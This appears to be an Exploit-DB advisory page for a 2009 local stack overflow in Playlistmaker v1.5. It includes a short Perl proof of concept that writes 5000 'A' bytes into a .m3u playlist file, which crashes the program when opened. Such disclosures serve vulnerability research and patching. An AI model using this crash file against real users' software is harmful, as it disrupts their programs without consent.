Playlistmaker v1.5 Local Stack Overflow POC

vendor:

Playlistmaker

by:

ThE g0bL!N

7,8

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: Playlistmaker

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Playlistmaker v1.5 Local Stack Overflow POC

This exploit is for Playlistmaker v1.5, which is vulnerable to a stack overflow vulnerability. The exploit creates a malicious .m3u, .m3l, or .txt file which, when opened, causes a stack overflow and crashes the program.

Mitigation:

Upgrade to the latest version of Playlistmaker.

Source

Exploit-DB raw data:

 #!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   Playlistmaker v1.5   (.M3U/M3L/Txt File) Local Stack Overflow POC        ##
# #  Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html        ##
## Welcom Back Milw0rm                                                         ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################

# milw0rm.com [2009-07-11]